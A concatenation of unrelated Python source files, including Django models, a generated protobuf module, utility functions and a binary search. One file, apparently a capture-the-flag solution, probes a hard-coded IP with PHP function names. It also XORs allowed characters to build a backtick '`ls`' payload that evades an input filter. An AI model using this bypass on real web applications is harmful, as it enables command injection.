        """Build the training transform pipeline: random horizontal flip,
        PIL->tensor conversion, then per-channel normalization (the mean/std
        values match the commonly used CIFAR-10 statistics — confirm dataset).
        """
        self.transform = transforms.Compose([transforms.RandomHorizontalFlip(), transforms.ToTensor(), transforms.Normalize((0.4914, 0.4822, 0.4465), (0.247, 0.243, 0.261))])
def getTransform(self):
return self.transform |
996,164 | 83197baefd0261892befe9ee293a5bdbce4a68ce | # THIS IS FILE-1
def add(a,b,c):
    """Return the sum of the three operands (left-to-right `+`)."""
    total = a + b
    total = total + c
    return total
def subtract(a,b):
    """Return a minus b."""
    difference = a - b
    return difference
#Multiply function deleted here
def remainder(a,b):
    """Return a modulo b (Python semantics: result takes the sign of b)."""
    result = a % b
    return result
def greater(a,b):
    """Return the larger of a and b; on a tie, b is returned (as in the original)."""
    if a > b:
        return a
    return b
|
996,165 | c020cbc99483f8207d9666810658c4c94d27a0bc | __version__ = "1.1.0"
default_app_config = "modoboa_demo.apps.DemoConfig"
|
996,166 | f52dc64e28679d82c144b8fbff34a63e71e70f74 | from django.apps import AppConfig
class QueryintentionConfig(AppConfig):
    """Django application configuration for the queryIntention app."""
    # Dotted module path Django uses to register this application.
    name = 'queryIntention'
|
996,167 | 4f29d707ddd0eee1bf8749f3a6d9b3dfa4d0a818 | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: google/api/distribution.proto
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from google.protobuf import any_pb2 as google_dot_protobuf_dot_any__pb2
from google.protobuf import timestamp_pb2 as google_dot_protobuf_dot_timestamp__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name="google/api/distribution.proto",
package="google.api",
syntax="proto3",
serialized_options=b"\n\016com.google.apiB\021DistributionProtoP\001ZCgoogle.golang.org/genproto/googleapis/api/distribution;distribution\242\002\004GAPI",
serialized_pb=b'\n\x1dgoogle/api/distribution.proto\x12\ngoogle.api\x1a\x19google/protobuf/any.proto\x1a\x1fgoogle/protobuf/timestamp.proto"\xd9\x06\n\x0c\x44istribution\x12\r\n\x05\x63ount\x18\x01 \x01(\x03\x12\x0c\n\x04mean\x18\x02 \x01(\x01\x12 \n\x18sum_of_squared_deviation\x18\x03 \x01(\x01\x12-\n\x05range\x18\x04 \x01(\x0b\x32\x1e.google.api.Distribution.Range\x12>\n\x0e\x62ucket_options\x18\x06 \x01(\x0b\x32&.google.api.Distribution.BucketOptions\x12\x15\n\rbucket_counts\x18\x07 \x03(\x03\x12\x34\n\texemplars\x18\n \x03(\x0b\x32!.google.api.Distribution.Exemplar\x1a!\n\x05Range\x12\x0b\n\x03min\x18\x01 \x01(\x01\x12\x0b\n\x03max\x18\x02 \x01(\x01\x1a\xb5\x03\n\rBucketOptions\x12G\n\x0elinear_buckets\x18\x01 \x01(\x0b\x32-.google.api.Distribution.BucketOptions.LinearH\x00\x12Q\n\x13\x65xponential_buckets\x18\x02 \x01(\x0b\x32\x32.google.api.Distribution.BucketOptions.ExponentialH\x00\x12K\n\x10\x65xplicit_buckets\x18\x03 \x01(\x0b\x32/.google.api.Distribution.BucketOptions.ExplicitH\x00\x1a\x43\n\x06Linear\x12\x1a\n\x12num_finite_buckets\x18\x01 \x01(\x05\x12\r\n\x05width\x18\x02 \x01(\x01\x12\x0e\n\x06offset\x18\x03 \x01(\x01\x1aO\n\x0b\x45xponential\x12\x1a\n\x12num_finite_buckets\x18\x01 \x01(\x05\x12\x15\n\rgrowth_factor\x18\x02 \x01(\x01\x12\r\n\x05scale\x18\x03 \x01(\x01\x1a\x1a\n\x08\x45xplicit\x12\x0e\n\x06\x62ounds\x18\x01 \x03(\x01\x42\t\n\x07options\x1as\n\x08\x45xemplar\x12\r\n\x05value\x18\x01 \x01(\x01\x12-\n\ttimestamp\x18\x02 \x01(\x0b\x32\x1a.google.protobuf.Timestamp\x12)\n\x0b\x61ttachments\x18\x03 \x03(\x0b\x32\x14.google.protobuf.AnyBq\n\x0e\x63om.google.apiB\x11\x44istributionProtoP\x01ZCgoogle.golang.org/genproto/googleapis/api/distribution;distribution\xa2\x02\x04GAPIb\x06proto3',
dependencies=[
google_dot_protobuf_dot_any__pb2.DESCRIPTOR,
google_dot_protobuf_dot_timestamp__pb2.DESCRIPTOR,
],
)
_DISTRIBUTION_RANGE = _descriptor.Descriptor(
name="Range",
full_name="google.api.Distribution.Range",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="min",
full_name="google.api.Distribution.Range.min",
index=0,
number=1,
type=1,
cpp_type=5,
label=1,
has_default_value=False,
default_value=float(0),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="max",
full_name="google.api.Distribution.Range.max",
index=1,
number=2,
type=1,
cpp_type=5,
label=1,
has_default_value=False,
default_value=float(0),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=373,
serialized_end=406,
)
_DISTRIBUTION_BUCKETOPTIONS_LINEAR = _descriptor.Descriptor(
name="Linear",
full_name="google.api.Distribution.BucketOptions.Linear",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="num_finite_buckets",
full_name="google.api.Distribution.BucketOptions.Linear.num_finite_buckets",
index=0,
number=1,
type=5,
cpp_type=1,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="width",
full_name="google.api.Distribution.BucketOptions.Linear.width",
index=1,
number=2,
type=1,
cpp_type=5,
label=1,
has_default_value=False,
default_value=float(0),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="offset",
full_name="google.api.Distribution.BucketOptions.Linear.offset",
index=2,
number=3,
type=1,
cpp_type=5,
label=1,
has_default_value=False,
default_value=float(0),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=659,
serialized_end=726,
)
_DISTRIBUTION_BUCKETOPTIONS_EXPONENTIAL = _descriptor.Descriptor(
name="Exponential",
full_name="google.api.Distribution.BucketOptions.Exponential",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="num_finite_buckets",
full_name="google.api.Distribution.BucketOptions.Exponential.num_finite_buckets",
index=0,
number=1,
type=5,
cpp_type=1,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="growth_factor",
full_name="google.api.Distribution.BucketOptions.Exponential.growth_factor",
index=1,
number=2,
type=1,
cpp_type=5,
label=1,
has_default_value=False,
default_value=float(0),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="scale",
full_name="google.api.Distribution.BucketOptions.Exponential.scale",
index=2,
number=3,
type=1,
cpp_type=5,
label=1,
has_default_value=False,
default_value=float(0),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=728,
serialized_end=807,
)
_DISTRIBUTION_BUCKETOPTIONS_EXPLICIT = _descriptor.Descriptor(
name="Explicit",
full_name="google.api.Distribution.BucketOptions.Explicit",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="bounds",
full_name="google.api.Distribution.BucketOptions.Explicit.bounds",
index=0,
number=1,
type=1,
cpp_type=5,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
)
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=809,
serialized_end=835,
)
_DISTRIBUTION_BUCKETOPTIONS = _descriptor.Descriptor(
name="BucketOptions",
full_name="google.api.Distribution.BucketOptions",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="linear_buckets",
full_name="google.api.Distribution.BucketOptions.linear_buckets",
index=0,
number=1,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="exponential_buckets",
full_name="google.api.Distribution.BucketOptions.exponential_buckets",
index=1,
number=2,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="explicit_buckets",
full_name="google.api.Distribution.BucketOptions.explicit_buckets",
index=2,
number=3,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[
_DISTRIBUTION_BUCKETOPTIONS_LINEAR,
_DISTRIBUTION_BUCKETOPTIONS_EXPONENTIAL,
_DISTRIBUTION_BUCKETOPTIONS_EXPLICIT,
],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[
_descriptor.OneofDescriptor(
name="options",
full_name="google.api.Distribution.BucketOptions.options",
index=0,
containing_type=None,
fields=[],
)
],
serialized_start=409,
serialized_end=846,
)
_DISTRIBUTION_EXEMPLAR = _descriptor.Descriptor(
name="Exemplar",
full_name="google.api.Distribution.Exemplar",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="value",
full_name="google.api.Distribution.Exemplar.value",
index=0,
number=1,
type=1,
cpp_type=5,
label=1,
has_default_value=False,
default_value=float(0),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="timestamp",
full_name="google.api.Distribution.Exemplar.timestamp",
index=1,
number=2,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="attachments",
full_name="google.api.Distribution.Exemplar.attachments",
index=2,
number=3,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=848,
serialized_end=963,
)
_DISTRIBUTION = _descriptor.Descriptor(
name="Distribution",
full_name="google.api.Distribution",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="count",
full_name="google.api.Distribution.count",
index=0,
number=1,
type=3,
cpp_type=2,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="mean",
full_name="google.api.Distribution.mean",
index=1,
number=2,
type=1,
cpp_type=5,
label=1,
has_default_value=False,
default_value=float(0),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="sum_of_squared_deviation",
full_name="google.api.Distribution.sum_of_squared_deviation",
index=2,
number=3,
type=1,
cpp_type=5,
label=1,
has_default_value=False,
default_value=float(0),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="range",
full_name="google.api.Distribution.range",
index=3,
number=4,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="bucket_options",
full_name="google.api.Distribution.bucket_options",
index=4,
number=6,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="bucket_counts",
full_name="google.api.Distribution.bucket_counts",
index=5,
number=7,
type=3,
cpp_type=2,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="exemplars",
full_name="google.api.Distribution.exemplars",
index=6,
number=10,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[
_DISTRIBUTION_RANGE,
_DISTRIBUTION_BUCKETOPTIONS,
_DISTRIBUTION_EXEMPLAR,
],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=106,
serialized_end=963,
)
_DISTRIBUTION_RANGE.containing_type = _DISTRIBUTION
_DISTRIBUTION_BUCKETOPTIONS_LINEAR.containing_type = _DISTRIBUTION_BUCKETOPTIONS
_DISTRIBUTION_BUCKETOPTIONS_EXPONENTIAL.containing_type = _DISTRIBUTION_BUCKETOPTIONS
_DISTRIBUTION_BUCKETOPTIONS_EXPLICIT.containing_type = _DISTRIBUTION_BUCKETOPTIONS
_DISTRIBUTION_BUCKETOPTIONS.fields_by_name[
"linear_buckets"
].message_type = _DISTRIBUTION_BUCKETOPTIONS_LINEAR
_DISTRIBUTION_BUCKETOPTIONS.fields_by_name[
"exponential_buckets"
].message_type = _DISTRIBUTION_BUCKETOPTIONS_EXPONENTIAL
_DISTRIBUTION_BUCKETOPTIONS.fields_by_name[
"explicit_buckets"
].message_type = _DISTRIBUTION_BUCKETOPTIONS_EXPLICIT
_DISTRIBUTION_BUCKETOPTIONS.containing_type = _DISTRIBUTION
_DISTRIBUTION_BUCKETOPTIONS.oneofs_by_name["options"].fields.append(
_DISTRIBUTION_BUCKETOPTIONS.fields_by_name["linear_buckets"]
)
_DISTRIBUTION_BUCKETOPTIONS.fields_by_name[
"linear_buckets"
].containing_oneof = _DISTRIBUTION_BUCKETOPTIONS.oneofs_by_name["options"]
_DISTRIBUTION_BUCKETOPTIONS.oneofs_by_name["options"].fields.append(
_DISTRIBUTION_BUCKETOPTIONS.fields_by_name["exponential_buckets"]
)
_DISTRIBUTION_BUCKETOPTIONS.fields_by_name[
"exponential_buckets"
].containing_oneof = _DISTRIBUTION_BUCKETOPTIONS.oneofs_by_name["options"]
_DISTRIBUTION_BUCKETOPTIONS.oneofs_by_name["options"].fields.append(
_DISTRIBUTION_BUCKETOPTIONS.fields_by_name["explicit_buckets"]
)
_DISTRIBUTION_BUCKETOPTIONS.fields_by_name[
"explicit_buckets"
].containing_oneof = _DISTRIBUTION_BUCKETOPTIONS.oneofs_by_name["options"]
_DISTRIBUTION_EXEMPLAR.fields_by_name[
"timestamp"
].message_type = google_dot_protobuf_dot_timestamp__pb2._TIMESTAMP
_DISTRIBUTION_EXEMPLAR.fields_by_name[
"attachments"
].message_type = google_dot_protobuf_dot_any__pb2._ANY
_DISTRIBUTION_EXEMPLAR.containing_type = _DISTRIBUTION
_DISTRIBUTION.fields_by_name["range"].message_type = _DISTRIBUTION_RANGE
_DISTRIBUTION.fields_by_name[
"bucket_options"
].message_type = _DISTRIBUTION_BUCKETOPTIONS
_DISTRIBUTION.fields_by_name["exemplars"].message_type = _DISTRIBUTION_EXEMPLAR
DESCRIPTOR.message_types_by_name["Distribution"] = _DISTRIBUTION
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
Distribution = _reflection.GeneratedProtocolMessageType(
"Distribution",
(_message.Message,),
{
"Range": _reflection.GeneratedProtocolMessageType(
"Range",
(_message.Message,),
{
"DESCRIPTOR": _DISTRIBUTION_RANGE,
"__module__": "google.api.distribution_pb2"
# @@protoc_insertion_point(class_scope:google.api.Distribution.Range)
},
),
"BucketOptions": _reflection.GeneratedProtocolMessageType(
"BucketOptions",
(_message.Message,),
{
"Linear": _reflection.GeneratedProtocolMessageType(
"Linear",
(_message.Message,),
{
"DESCRIPTOR": _DISTRIBUTION_BUCKETOPTIONS_LINEAR,
"__module__": "google.api.distribution_pb2"
# @@protoc_insertion_point(class_scope:google.api.Distribution.BucketOptions.Linear)
},
),
"Exponential": _reflection.GeneratedProtocolMessageType(
"Exponential",
(_message.Message,),
{
"DESCRIPTOR": _DISTRIBUTION_BUCKETOPTIONS_EXPONENTIAL,
"__module__": "google.api.distribution_pb2"
# @@protoc_insertion_point(class_scope:google.api.Distribution.BucketOptions.Exponential)
},
),
"Explicit": _reflection.GeneratedProtocolMessageType(
"Explicit",
(_message.Message,),
{
"DESCRIPTOR": _DISTRIBUTION_BUCKETOPTIONS_EXPLICIT,
"__module__": "google.api.distribution_pb2"
# @@protoc_insertion_point(class_scope:google.api.Distribution.BucketOptions.Explicit)
},
),
"DESCRIPTOR": _DISTRIBUTION_BUCKETOPTIONS,
"__module__": "google.api.distribution_pb2"
# @@protoc_insertion_point(class_scope:google.api.Distribution.BucketOptions)
},
),
"Exemplar": _reflection.GeneratedProtocolMessageType(
"Exemplar",
(_message.Message,),
{
"DESCRIPTOR": _DISTRIBUTION_EXEMPLAR,
"__module__": "google.api.distribution_pb2"
# @@protoc_insertion_point(class_scope:google.api.Distribution.Exemplar)
},
),
"DESCRIPTOR": _DISTRIBUTION,
"__module__": "google.api.distribution_pb2"
# @@protoc_insertion_point(class_scope:google.api.Distribution)
},
)
_sym_db.RegisterMessage(Distribution)
_sym_db.RegisterMessage(Distribution.Range)
_sym_db.RegisterMessage(Distribution.BucketOptions)
_sym_db.RegisterMessage(Distribution.BucketOptions.Linear)
_sym_db.RegisterMessage(Distribution.BucketOptions.Exponential)
_sym_db.RegisterMessage(Distribution.BucketOptions.Explicit)
_sym_db.RegisterMessage(Distribution.Exemplar)
DESCRIPTOR._options = None
# @@protoc_insertion_point(module_scope)
|
996,168 | f8a28ff6f6d74a7b778008d5354ef7c28c38e691 | # Keywords
# and: logical operator
# or: logical operator
# not: logical operator
# del: deletes an object
# import: allows you import a module
# from: import specific parts of a module
# while: begins the while loops
# as: creates an alias when importing
# global: declare a global variable
# with: used to simplify exception handling
# assert: for debugging
# if: keyword used for branching code
# elif: keyword used for branching code
# else: keyword used for branching code
# pass: a statement that does nothing but can be used as a placeholder
# yield: pauses a function and produces a value; a function that uses it returns a generator
# break: breaks out of a loop
# except: what to do when an exception occurs
# class: define a class
# in: check if a value is inside a list
# raise: raise an exception
# continue: continue to the next iteration of the loop
# finally: a block of code that executes no matter what
# is: tests whether 2 variables refer to the same object (identity, not equality)
# return: returns something from a function
# def: define a function
# for: create a for loop
# lambda: create an anonymous function
# try: makes a try except statement
# DATA TYPES
# Integers
# floats
# Strings
# Booleans
# Lists
# OPERATORS
# + Add
# - Subtract
# * Multiply
# ** Raise to the power of
# / Divide
# // Divide and remove decimal places
# % modulus
# < less than
# > greater than
# <= less than or equal to
# >= greater than or equal to
# == equality test
# != not equal to
# () used for parameters
# [] used with a List
# {} used to map a dictionary
# @ class/function decorator
# , item separator
# : start a block of code e.g. if, else, while, function ...
# = assign
# ; used to put multiple statements on one line
# += increment operator also can do -= *= /= //= %= **=
# . dot operator used to access function variables from other python files
|
996,169 | dfbc69fe736e4891ff33bb7d053d54eae0a927e9 | from django.db import models
# Create your models here.
class Prestamo(models.Model):
    """Loan (prestamo) record with checkout and return dates."""
    codigo = models.AutoField(primary_key=True)
    # Dates are kept as free-form text in this schema.
    fechaSalida = models.CharField(max_length=50)
    fechaRegreso = models.CharField(max_length=50)

    def cuota(self):
        """Compute the loan fee (not implemented yet)."""
        # Fix: added the missing `self`; the original `def cuota():` raised
        # TypeError when called as prestamo.cuota().
        pass

    def __str__(self):
        return str(self.codigo)
class Material(models.Model):
    """Catalog item (book, magazine, ...) that can be loaned out."""
    codigo = models.AutoField(primary_key=True)
    tipoMaterial = models.CharField(max_length=50)
    autor = models.CharField(max_length=50)
    titulo = models.CharField(max_length=50)
    año = models.IntegerField()
    status = models.CharField(max_length=50)
    # Loan this material currently belongs to.
    prestamo = models.ForeignKey('Prestamo', on_delete=models.CASCADE, null = False)

    def altaMaterial(self):
        """Register the material (not implemented yet)."""
        # Fix: added the missing `self` to these three methods; as originally
        # written (`def altaMaterial():`) they raised TypeError on instance calls.
        pass

    def bajaMaterial(self):
        """Retire the material (not implemented yet)."""
        pass

    def cambioMaterial(self):
        """Modify the material (not implemented yet)."""
        pass

    def __str__(self):
        return str(self.tipoMaterial)
class Persona(models.Model):
    """Person (student or teacher) who can borrow material."""
    prestamo = models.OneToOneField('Prestamo', on_delete = models.CASCADE, null = False)
    tipoPersona = models.CharField(max_length = 100)
    nombre = models.CharField(max_length = 30)
    apellido = models.CharField(max_length = 30)
    telefono = models.IntegerField()
    correo = models.CharField(max_length = 30)
    numLibros = models.IntegerField()
    adeudo = models.FloatField()

    def llevarMaterial(self):
        """Borrow material (not implemented yet)."""
        # Fix: added the missing `self` to both methods; as originally written
        # they raised TypeError when called on an instance.
        pass

    def dejarMaterial(self):
        """Return material (not implemented yet)."""
        pass

    def __str__(self):
        return str(self.nombre)
class Libro(Material):
    """Book: a Material with a publisher and an optional cover image."""
    editorial = models.CharField(max_length=50)
    # Optional uploaded cover file.
    portada = models.FileField(blank = True)
    def __str__(self):
        return str(self.titulo)
class Revista(Material):
    """Magazine: a Material with no extra fields of its own."""
    def __str__(self):
        return str(self.titulo)
class Profesor(Persona):
    """Teacher: a Persona identified by an employee number."""
    numEmpleado = models.AutoField(primary_key=True)
    def __str__(self):
        return str(self.nombre)
class Alumno(Persona):
    """Student: a Persona identified by an enrollment number (matricula)."""
    matricula = models.AutoField(primary_key=True)
    def __str__(self):
        return str(self.nombre)
|
996,170 | c5e250228a5bc3a39468c1725d660e33398c092c |
'''
Author: lanyongliang
Email: lanyongliang@xdf.cn
Date: 2021-07-15 00:12:02
LastEditors: Please set LastEditors
LastEditTime: 2021-07-15 01:21:58
FilePath: \BinarySearch\binary_search.py
'''
import random
class BinarySearch(object):
"""
1、二分查找必须是有序类表
2、选好起始查找位置,中间开始,减少一半的查找元素
3、时间复杂度为 ${log_2 10}$
"""
def __call__(self, search_list, num):
output = self.search(search_list, num)
return output
def search(self, search_list, num):
end = len(search_list)
start = 0
guess = (start + end) // 2
while start < guess:
if len(search_list) >= 1:
if search_list[guess] == num:
return guess
elif search_list[guess] > num:
end = guess
else:
start = guess + 1
guess = (start + end) // 2
else:
return None
random_list = random.sample(range(0,100),20)
random_list.sort()
binary_search = BinarySearch()
print("查找集合:{}".format(random_list))
output = binary_search(random_list, 10)
print("output:{}".format(output))
|
996,171 | 8616a9e3edc17018eaa50d861a8b56930bcc2b92 | import json
from sys import argv
basic = {}
model = {}
te = ['economist.json','economist_basic.json','economist_model.json']
cet46 = ['cet46.json','cet46_basic.json','cet46_model.json']
script,dic = argv
if dic == 'te':
dicc = te
else:
dicc = cet46
print(dicc)
with open(dicc[0],'r')as fo:
adic = json.load(fo)
dicLen = len(adic)
for word in adic:
try:
db = {'ex':adic[word]['ex'],'pron':adic[word]['pron']}
dm = {'eg2':adic[word]['eg2']}
try:
dm['wp'] = adic[word]['wp']
except Exception as err:
print(err)
try:
db['st'] = adic[word]['st']
except Exception as err:
print(err)
finally:
basic[word] = db
model[word] = dm
except Exception as err:
print(err,'seperate error: ',word)
with open(dicc[1],'w')as fb:
json.dump(basic,fb)
with open(dicc[2],'w')as fm:
json.dump(model,fm)
print(dicLen)
|
996,172 | 938080bb0fcd67611824436d8578cc2e955fd039 | from azure.cosmosdb.sql.models import (
Database,
Collection,
)
from azure.cosmosdb.sql.documentservice import DocumentService |
996,173 | 531dc7a3ec909f0d7f90caef9804e0da1712d14d | # RazviOverflow
# Python3
'''
import requests
url = "http://192.46.227.32/"
functions = ["get_called_class","get_parent_class","get_included_files","get_required_files","get_class_vars","get_object_vars","get_class_methods","get_declared_classes","get_declared_traits","get_declared_interfaces","get_defined_functions","get_defined_vars","get_resource_type","get_resources","get_loaded_extensions","get_extension_funcs","get_defined_constants","getdate","get_html_translation_table","getimagesize","getimagesizefromstring","getrandmax","getservbyname","getservbyport","getprotobyname","getprotobynumber","getmyuid","getmygid","getmypid","getmyinode","getlastmod","getenv","getopt","gettimeofday","getrusage","get_current_user","get_cfg_var","get_magic_quotes_gpc","get_magic_quotes_runtime","get_include_path","gethostbyaddr","gethostbyname","gethostbynamel","gethostname","getmxrr","gettype","get_meta_tags","get_headers","get_browser","getcwd","getallheaders","gettext","get_lucky_number","get_lucky_word"]
for function in functions:
print("[+] Requesting " + function)
print(requests.get(url, params={'roll' : function}).text)
print("[+] Requesting " + function + " as array")
print(requests.get(url, params={'roll' : "var_dump(" + function + "())"}).text)
def get_xor_strings(expected, valids):
word1 = ""
word2 = ""
for i in expected:
for valid in valids:
result = chr(ord(i) ^ ord(valid))
if result in valids:
word1 = word1 + result
word2 = word2 + valid
break
return word1, word2
'''
import string
def xor(str1, str2):
    """XOR two strings character-by-character; zip truncates to the shorter one."""
    return ''.join(chr(ord(a) ^ ord(b)) for a, b in zip(str1, str2))
def get_xor_strings(expected, valids):
    """For each char of `expected`, find the first pair of `valids` characters
    whose XOR reproduces it. Characters with no such pair are silently skipped.
    Returns (word1, word2) with xor(word1, word2) == the reproducible chars."""
    word1 = ""
    word2 = ""
    for ch in expected:
        for candidate in valids:
            masked = chr(ord(ch) ^ ord(candidate))
            if masked in valids:
                word1 += masked
                word2 += candidate
                break
    return word1, word2
# Build the allowed character set (letters plus a few filter-safe symbols),
# then derive two "valid" words whose XOR yields the blocked payload `ls`.
valids = list(string.ascii_letters) + ["(", ")", "_", "."]
print("[+] Generated valids => {}".format(valids))
expected = "`ls`"
word1, word2 = get_xor_strings(expected, valids)
print("[+] Word 1 {}- Word2 {}".format(word1, word2))
result = xor(word1, word2)
print("[+] Verifying... Should be {} => {}".format(expected, result))
996,174 | af0b4af6fe93da2f51a0b1b153010546a499f296 | from django.contrib import admin
from .models import Place, Trend, Placetype, Layer, Clusters, Word, TrendWord
class PlaceAdmin(admin.ModelAdmin):
    # Admin change-list for Place; search box matches either name field.
    search_fields = ('name', 'another_name')
class PlaceElement(admin.TabularInline):
    # Tabular inline so Place rows can be edited from a parent admin page.
    model = Place
class TrendAdmin(admin.ModelAdmin):
    # Admin change-list for Trend, searchable by name.
    search_fields = ('name',)
class ClustersWord(admin.TabularInline):
    # Tabular inline so Word rows can be edited from a parent admin page.
    model = Word
class ClustersAdmin(admin.ModelAdmin):
    # Clusters admin: searchable by name, with its Words editable inline.
    search_fields = ('name',)
    inlines = [ClustersWord,]
class WordAdmin(admin.ModelAdmin):
    # Admin change-list for Word, searchable by name.
    search_fields = ('name',)
class LayerAdmin(admin.ModelAdmin):
    # Layer admin: searchable by name, with its Places editable inline.
    search_fields = ('name',)
    inlines = [PlaceElement,]
class TrendWordAdmin(admin.ModelAdmin):
    # Through-table admin; search on the two foreign-key columns.
    search_fields = ('trend_id', 'word_id',)
# Register every model with its admin class (None = default ModelAdmin),
# preserving the original registration order.
for _model, _admin_class in (
    (Layer, LayerAdmin),
    (Place, PlaceAdmin),
    (Trend, TrendAdmin),
    (Placetype, None),
    (Word, WordAdmin),
    (Clusters, ClustersAdmin),
    (TrendWord, TrendWordAdmin),
):
    if _admin_class is None:
        admin.site.register(_model)
    else:
        admin.site.register(_model, _admin_class)
|
996,175 | 4f85e7e8086fbabe669a0209867984b52af3a65f | from django.contrib.auth.mixins import UserPassesTestMixin
from rest_framework import parsers, permissions, status
from rest_framework.exceptions import PermissionDenied
from rest_framework.generics import get_object_or_404
from rest_framework.response import Response
from rest_framework.views import APIView
from rest_framework.viewsets import ModelViewSet
from accounts.models import Account
from albums.models import Album
